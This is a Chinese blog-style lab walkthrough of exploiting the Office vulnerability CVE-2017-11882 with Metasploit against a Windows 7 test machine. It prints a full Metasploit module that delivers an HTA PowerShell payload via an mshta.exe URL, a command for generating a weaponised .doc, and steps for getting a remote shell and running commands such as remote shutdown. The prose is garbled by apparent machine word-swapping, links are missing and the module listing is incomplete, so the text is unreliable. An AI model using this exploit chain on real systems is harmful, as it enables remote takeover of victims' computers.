CVE-2017-11882漏洞 Msf利用复现

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office二〇一三、激活工具

  3. win7旗舰版ISO镜像

上述工具已经打包好,下载地址:

链接:  密码:xl91

图片 1

 

Office掩盖17年的疏漏CVE_2017_11882测量试验记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参照小说1:

参照作品2:

 

POC地址:

 

中间环节出现,msf连接数据库失利的情状,消弭措施:

 

1.构建标准

 

 

那边搭建两台设想机进行测量检验!

 

测量试验机配置新闻:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

首先在kali下安装nginx,只怕tomcat应该也是足以的,首先将转移的doc文件放在/usr/share/nginx/html目录下,方便被攻击的机器获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c "mshta ;; -o cev2.doc

# 将下载好的尾巴模块放在msf大肆目录下

root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的内容如下:

##

# This module requires Metasploit:

# Current source:

##

class MetasploitModule  < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})

    super(update_info(info,

      'Name' => 'Microsoft Office Payload Delivery',

      'Description' => %q{

        This module generates an command to place within

        a word document, that when executed, will retrieve a HTA payload

        via HTTP from an web server. Currently have not figured out how

        to generate a doc.

      },

      'License' => MSF_LICENSE,

      'Arch' => ARCH_X86,

      'Platform' => 'win',

      'Targets' =>

        [

          ['Automatic', {} ],

        ],

      'DefaultTarget' => 0,

    ))

  end

  def on_request_uri(cli, _request)

    print_status("Delivering payload")

    p = regenerate_payload(cli)

    data = Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      'win',

      p.encoded,

      'hta-psh',

      { :arch => ARCH_X86, :platform => 'win '}

    )

    send_response(cli, data, 'Content-Type' => 'application/hta')

  end

  def primer

    url = get_uri

    print_status("Place the following DDE in an MS document:")

    print_line("mshta.exe \"#{url}\"")

  end

 

下一场,这里在接受msfconsole早先,供给先开拓数据库,比方 service postgresql start 

开辟数据库之后,步向msfconsole,然后对msf举行最早化,实践msf init

之后search cve_2017_11882搜索漏洞模块,然后依照【参谋作品2】举办布局,最终exploit 之后运行对 8080 端口的监听,至于缘何是8080端口小编也不太驾驭啊!

 

2.一发千钧,只欠东风

 

其有的时候候,只要求在 win7 上通过浏览器的到 cve2.doc文书档案,展开之后,kali中命令行立时展现已经收获到了连接,

图片 2

图片 3

session命令得到回应,session -i 【id】建构连接

shell命令能够收获cmd,施行net user查看客商

图片 4

图片 5

 

3.试验效果

 

由此这些漏洞,可以堂而皇之的进行一些命令,比如关机,删除一些文书,采摘一些种类消息恐怕十三分平价的

在桌面新建文件夹

图片 6

长途关机

图片 7

固然取获得了命令行,可是经过net user命令能够看来登入的客户等级是Guest,这就节制了意气风发部分要求权限较高的吩咐执行!

与此同不常候这里win7未有设置杀软,笔者不清楚安装杀软之后word文档会不会被查杀呢?

 

 

晚上时候接收了推送的狐狸尾巴预先警示,在网络检索相关音信来看超级多大拿已经支付出生成doc文书档案的台本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的行使。